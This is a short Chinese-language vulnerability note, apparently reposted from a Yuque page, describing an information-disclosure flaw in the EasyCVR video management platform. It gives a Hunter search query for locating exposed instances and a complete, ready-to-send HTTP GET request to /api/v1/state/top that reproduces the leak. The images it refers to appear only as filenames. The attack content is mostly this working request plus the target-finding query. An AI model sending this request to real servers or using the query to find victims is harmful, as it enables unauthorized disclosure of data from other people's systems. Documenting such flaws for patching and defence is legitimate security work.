登录 白背景
源码

EasyCVR 视频管理平台top存在信息泄露漏洞

一、漏洞简介

EasyCVR 视频管理平台是 TSINGSEE 青犀视频旗下一款软硬一体的产品,可提供多协议的设备接入、采集、AI 智能检测、处理、分发等服务。EasyCVR 视频管理平台top存在信息泄露漏洞

二、影响版本

  • EasyCVR 视频管理平台

三、资产测绘

  • hunterweb.title="EasyCVR"
  • 特征

1699021094705-867464c9-0dfb-4275-b909-1b8d11a3776d.png

四、漏洞复现

GET /api/v1/state/top HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

1717750373861-eda8206d-30fe-4d64-99fc-d949fb9d09d8.png

原文: https://www.yuque.com/xiaokp7/ocvun2/nqn95vf6z5htlm7e